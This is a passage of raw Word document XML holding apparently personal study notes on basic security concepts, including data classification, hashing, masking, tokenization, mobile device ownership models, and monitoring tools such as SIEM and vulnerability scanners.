                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Vulnerability patching</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2EC8" w:rsidRPr="005B4891" w14:paraId="41F47522" w14:textId="77777777" w:rsidTr="00171C56">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2265" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AF0C11E" w14:textId="391C7ADA" w:rsidR="007A2EC8" w:rsidRPr="005B4891" w:rsidRDefault="00171C56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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Administrative Controls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2265" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="012D931D" w14:textId="5CE2C9B1" w:rsidR="007A2EC8" w:rsidRPr="005B4891" w:rsidRDefault="00171C56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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Onboarding policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2266" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C7172B6" w14:textId="6E1D0F6A" w:rsidR="007A2EC8" w:rsidRPr="005B4891" w:rsidRDefault="00171C56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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Audit logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2266" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="374A8C48" w14:textId="61CD905A" w:rsidR="007A2EC8" w:rsidRPr="005B4891" w:rsidRDefault="00171C56" w:rsidP="00520960">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2902"/>
                <w:tab w:val="left" w:pos="511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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Incident response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4AE864A7" w14:textId="541B0F9B" w:rsidR="00FD2B81" w:rsidRPr="005B4891" w:rsidRDefault="00FD2B81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Data Classifications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D8F310" w14:textId="0CC7E451" w:rsidR="00FD2B81" w:rsidRPr="005B4891" w:rsidRDefault="00FD2B81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Confidential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E332F93" w14:textId="60A97D2A" w:rsidR="00FD2B81" w:rsidRPr="005B4891" w:rsidRDefault="00FD2B81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Secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02775637" w14:textId="0F54FFBA" w:rsidR="007F79F3" w:rsidRPr="005B4891" w:rsidRDefault="00FD2B81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Top Secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBF238D" w14:textId="5A6A1D9F" w:rsidR="007F79F3" w:rsidRPr="005B4891" w:rsidRDefault="007F79F3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Data States:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6422FDFB" w14:textId="6BB7988F" w:rsidR="007F79F3" w:rsidRPr="005B4891" w:rsidRDefault="007F79F3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Data at rest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3A68F8" w14:textId="79642F93" w:rsidR="00AE4BCD" w:rsidRPr="005B4891" w:rsidRDefault="00AE4BCD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Data in transit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425D61AD" w14:textId="4F8DE3E4" w:rsidR="002C789C" w:rsidRPr="005B4891" w:rsidRDefault="002C789C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Data in use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D77852E" w14:textId="77777777" w:rsidR="003B202E" w:rsidRPr="005B4891" w:rsidRDefault="003B202E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</w:p>
    <w:p w14:paraId="3380074B" w14:textId="734CB65A" w:rsidR="003B202E" w:rsidRPr="005B4891" w:rsidRDefault="003B202E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lastRenderedPageBreak/>
        <w:t>Encryption is for confidentiality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBA95A8" w14:textId="482593DC" w:rsidR="003B202E" w:rsidRPr="005B4891" w:rsidRDefault="00D5479D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 xml:space="preserve">Hashing is running a string through </w:t>
      </w:r>
      <w:r w:rsidR="00241967" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> hashing algorithm to spit out </w:t>
      </w:r>
      <w:r w:rsidR="003D14BF" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">something, which can be used to compare </w:t>
      </w:r>
      <w:r w:rsidR="00B30162" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>to the hashing algorithm to decrypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4016ADA7" w14:textId="1D4CC0F6" w:rsidR="00711612" w:rsidRPr="005B4891" w:rsidRDefault="00711612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Masking</w:t>
      </w:r>
      <w:r w:rsidR="0053492F" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> is substituting a character with for example an </w:t>
      </w:r>
      <w:r w:rsidR="00241967" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="0053492F" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidR="00241967" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00A55C7D" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="004D55A7" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>obfuscate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04488D39" w14:textId="65061111" w:rsidR="003B202E" w:rsidRPr="005B4891" w:rsidRDefault="009763AD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 xml:space="preserve">Geographic restrictions </w:t>
      </w:r>
      <w:r w:rsidR="00720393" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>to obviously restrict access from other places</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351C867D" w14:textId="1E3D13AC" w:rsidR="00720393" w:rsidRPr="005B4891" w:rsidRDefault="00720393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 xml:space="preserve">Tokenization </w:t>
      </w:r>
      <w:r w:rsidR="00241967" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="00AF1074" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00241967" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> character substitution through a token process</w:t>
      </w:r>
      <w:r w:rsidR="00C87154" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, either reversable or non-reversable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9616CF" w14:textId="53CE774A" w:rsidR="00720393" w:rsidRPr="005B4891" w:rsidRDefault="00713BA6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Ob</w:t>
      </w:r>
      <w:r w:rsidR="008E5C36" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>fuscation in multiple methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BB8F80" w14:textId="76BC1B89" w:rsidR="008E5C36" w:rsidRPr="005B4891" w:rsidRDefault="008E5C36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Segmentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF6159A" w14:textId="051DB56F" w:rsidR="008E5C36" w:rsidRPr="005B4891" w:rsidRDefault="008E5C36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 xml:space="preserve">| VLAN 100 | VLAN 200 | VLAN 300 | </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129712D2" w14:textId="25CEDD4B" w:rsidR="0066191C" w:rsidRPr="005B4891" w:rsidRDefault="0066191C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Load balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA670F2" w14:textId="37863E5D" w:rsidR="00DF0830" w:rsidRPr="005B4891" w:rsidRDefault="0066191C" w:rsidP="000C63D9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Clustering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CECAD70" w14:textId="77777777" w:rsidR="00696E66" w:rsidRPr="005B4891" w:rsidRDefault="002D5573" w:rsidP="00696E66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Backups | Onsite | Offsite | Replication</w:t>
      </w:r>
      <w:r w:rsidR="0026785D" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> |</w:t>
      </w:r>
      <w:r w:rsidR="00853E92" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Snapshots |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA95F18" w14:textId="348E29F7" w:rsidR="00DF0830" w:rsidRPr="005B4891" w:rsidRDefault="0019165B" w:rsidP="00696E66">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2902"/>
          <w:tab w:val="left" w:pos="5118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ab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1E9800" w14:textId="3A890819" w:rsidR="0019165B" w:rsidRPr="00A05553" w:rsidRDefault="0019165B" w:rsidP="009B101B">
      <w:pPr>
        <w:pStyle w:val="Overskrift1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc198019370"/>
      <w:r w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mobile devices:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="00FB9BC1" w14:textId="02543D9A" w:rsidR="0019165B" w:rsidRPr="005B4891" w:rsidRDefault="0019165B" w:rsidP="0019165B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6480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BYOD – Personally owned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515CD3AE" w14:textId="4887FD95" w:rsidR="0019165B" w:rsidRPr="005B4891" w:rsidRDefault="0019165B" w:rsidP="0019165B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6480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COPE – Corporat</w:t>
      </w:r>
      <w:r w:rsidR="00FB6CF3" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>el</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>y-owned, used like personal device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4D852A" w14:textId="509B84B5" w:rsidR="0019165B" w:rsidRPr="005B4891" w:rsidRDefault="0019165B" w:rsidP="0019165B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6480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CYOD – Corporately-owned, choose from a limited number of devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2EE01C" w14:textId="26D7FA71" w:rsidR="00C82463" w:rsidRPr="005B4891" w:rsidRDefault="00C82463" w:rsidP="0019165B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6480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 xml:space="preserve">COSU = </w:t>
      </w:r>
      <w:r w:rsidR="005861D7" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Corporately-owned</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, special use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF425DF" w14:textId="77777777" w:rsidR="00555A97" w:rsidRPr="005B4891" w:rsidRDefault="00555A97" w:rsidP="0019165B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6480"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A43E4C7" w14:textId="5B36A2B2" w:rsidR="00555A97" w:rsidRPr="005B4891" w:rsidRDefault="00555A97" w:rsidP="0019165B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6480"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A0C6D17" wp14:editId="25283940">
            <wp:extent cx="4572000" cy="4007556"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1588399466" name="Bilde 1" descr="Et bilde som inneholder tekst, skjermbilde, line, Fon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99466" name="Bilde 1" descr="Et bilde som inneholder tekst, skjermbilde, line, Font&#10;&#10;KI-generert innhold kan være feil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1902" cy="404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8C0A" w14:textId="34DAF5E5" w:rsidR="009103D7" w:rsidRPr="005B4891" w:rsidRDefault="009103D7" w:rsidP="0019165B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6480"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F181973" wp14:editId="2004493E">
            <wp:extent cx="4449875" cy="2900856"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="971799171" name="Bilde 1" descr="Et bilde som inneholder tekst, skjermbilde, diagram, Fon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99171" name="Bilde 1" descr="Et bilde som inneholder tekst, skjermbilde, diagram, Font&#10;&#10;KI-generert innhold kan være feil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1536" cy="29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93CA" w14:textId="77777777" w:rsidR="00C12F84" w:rsidRPr="005B4891" w:rsidRDefault="00C12F84" w:rsidP="0019165B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6480"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3078B0D7" w14:textId="77777777" w:rsidR="00C12F84" w:rsidRPr="005B4891" w:rsidRDefault="00C12F84" w:rsidP="0019165B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6480"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AB5587C" w14:textId="77777777" w:rsidR="00C563A7" w:rsidRPr="005B4891" w:rsidRDefault="00C563A7" w:rsidP="0019165B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6480"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E5CB146" w14:textId="77777777" w:rsidR="00C563A7" w:rsidRPr="005B4891" w:rsidRDefault="00C563A7" w:rsidP="0019165B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6480"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BD01EA8" w14:textId="0DF7AE32" w:rsidR="004D5553" w:rsidRPr="00A05553" w:rsidRDefault="004D5553" w:rsidP="009B101B">
      <w:pPr>
        <w:pStyle w:val="Overskrift1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc198019371"/>
      <w:r w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Monitoring and </w:t>
      </w:r>
      <w:r w:rsidR="00C71BD1" w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>alerting</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="3BCBF48C" w14:textId="77777777" w:rsidR="004D5553" w:rsidRPr="005B4891" w:rsidRDefault="004D5553" w:rsidP="0019165B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6480"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39A06429" w14:textId="2A13FCA5" w:rsidR="009103D7" w:rsidRPr="005B4891" w:rsidRDefault="004F0062" w:rsidP="0019165B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6480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 xml:space="preserve">SCAP </w:t>
      </w:r>
      <w:r w:rsidR="00141274" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Security </w:t>
      </w:r>
      <w:r w:rsidR="00141274" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Content Automation Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A7D8F3" w14:textId="77777777" w:rsidR="003F0628" w:rsidRPr="005B4891" w:rsidRDefault="00F25B3A" w:rsidP="00F25B3A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7597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SIEM</w:t>
      </w:r>
      <w:r w:rsidR="003F4EEC" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> = Security Information and Event Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340E323C" w14:textId="3B4A7ED5" w:rsidR="00315F6A" w:rsidRPr="005B4891" w:rsidRDefault="00315F6A" w:rsidP="00F25B3A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7597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DLP = Data Loss Prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE0A234" w14:textId="2EB01479" w:rsidR="00F25B3A" w:rsidRPr="005B4891" w:rsidRDefault="003F0628" w:rsidP="00F25B3A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7597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Antivirus</w:t>
      </w:r>
      <w:r w:rsidR="00F25B3A" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC0CBB4" w14:textId="6E134A69" w:rsidR="003F1FD5" w:rsidRPr="005B4891" w:rsidRDefault="003F1FD5" w:rsidP="00F25B3A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7597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SNMP Tra</w:t>
      </w:r>
      <w:r w:rsidR="00C14C6C" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ps = Simple Network Management Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227B8F1D" w14:textId="6FACEA5D" w:rsidR="00BE6B88" w:rsidRPr="005B4891" w:rsidRDefault="00C76A7C" w:rsidP="00F25B3A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7597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Netflow = Detailed information about network flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A92C058" w14:textId="7F52CE20" w:rsidR="00E4413F" w:rsidRPr="005B4891" w:rsidRDefault="00E4413F" w:rsidP="00F25B3A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7597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Benchmarks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB16781" w14:textId="0439EFF6" w:rsidR="00066801" w:rsidRPr="005B4891" w:rsidRDefault="00066801" w:rsidP="00F25B3A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7597"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Vulnerability Scanners</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246DD979" w14:textId="77777777" w:rsidR="00A6112A" w:rsidRPr="005B4891" w:rsidRDefault="00A6112A" w:rsidP="00F25B3A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7597"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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0624" w:rsidRPr="005B4891" w14:paraId="743D05C0" w14:textId="77777777" w:rsidTr="00F00624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DF2545B" w14:textId="7519510D" w:rsidR="00F00624" w:rsidRPr="005B4891" w:rsidRDefault="00F00624" w:rsidP="00520960">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="759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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="749ADDD4" w14:textId="2C422FC8" w:rsidR="00F00624" w:rsidRPr="005B4891" w:rsidRDefault="00F00624" w:rsidP="00520960">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="759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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Agentless</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F00624" w:rsidRPr="005B4891" w14:paraId="0E828F70" w14:textId="77777777" w:rsidTr="00F00624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64127AC7" w14:textId="3B4B19E9" w:rsidR="00F00624" w:rsidRPr="005B4891" w:rsidRDefault="00F00624" w:rsidP="00520960">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="7597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Install required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33FD1104" w14:textId="1B20B321" w:rsidR="00F00624" w:rsidRPr="005B4891" w:rsidRDefault="00F00624" w:rsidP="00520960">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="7597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No install required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F00624" w:rsidRPr="005B4891" w14:paraId="67B37771" w14:textId="77777777" w:rsidTr="00F00624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41C56C04" w14:textId="0C1C45AA" w:rsidR="00F00624" w:rsidRPr="005B4891" w:rsidRDefault="00F00624" w:rsidP="00520960">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="7597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Prop</w:t>
            </w:r>
            <w:r w:rsidR="000C2A4E" w:rsidRPr="005B4891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>rietary</w:t>
            </w:r>
          </w:p>
        </w:tc>
